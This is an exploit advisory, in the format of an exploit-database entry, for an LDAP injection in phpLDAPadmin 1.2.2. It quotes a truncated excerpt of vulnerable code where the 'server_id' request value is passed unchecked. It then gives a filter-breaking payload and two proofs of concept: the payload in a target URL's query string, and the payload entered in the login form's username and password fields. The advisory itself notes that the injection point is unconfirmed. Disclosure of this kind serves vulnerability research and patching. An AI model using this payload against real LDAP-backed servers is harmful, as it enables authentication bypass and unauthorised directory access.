# Exploit Title: phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)
# Google Dork: N/A
# Date: 21.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://phpldapadmin.sourceforge.net
# Software Link: http://phpldapadmin.sourceforge.net
# Version: 1.2.2
# Tested on: Pardus / Debian Web Server
# CVE : N/A

# Vulnerable Code (excerpt; the statement is truncated in the original advisory)
# The 'server_id' value is read straight from the request (the 'REQUEST' scope of get_request(),
# i.e. GET/POST/cookie) and handed to getServer() without any validation, allow-listing or
# escaping. The excerpt does not show where the value is used afterwards, so the exact LDAP
# filter sink should be confirmed against the full 1.2.2 source before relying on this write-up.
$server = $_SESSION[APPCONFIG]->getServer(get_request('server_id','REQUEST'));
if (count($server->untested())) system_message(array(

# Payload
# Note: the payload contains '&' characters. When it is placed in a URL query string (PoC 1) it
# must be URL-encoded (at minimum '&' -> %26), otherwise the browser/server splits it into
# separate parameters and the LDAP filter never receives the full string.
!(()&&!|*|*|

# PoC 1 - payload appended to the 'server_id' query parameter (URL-encode it as noted above)
http://target/phpldapadmin/cmd.php?cmd=login_form&server_id=1!(()&&!|*|*|&redirect=true

# PoC 2 - the same payload submitted through the login form (username and password fields)
username: !(()&&!|*|*|
password: !(()&&!|*|*|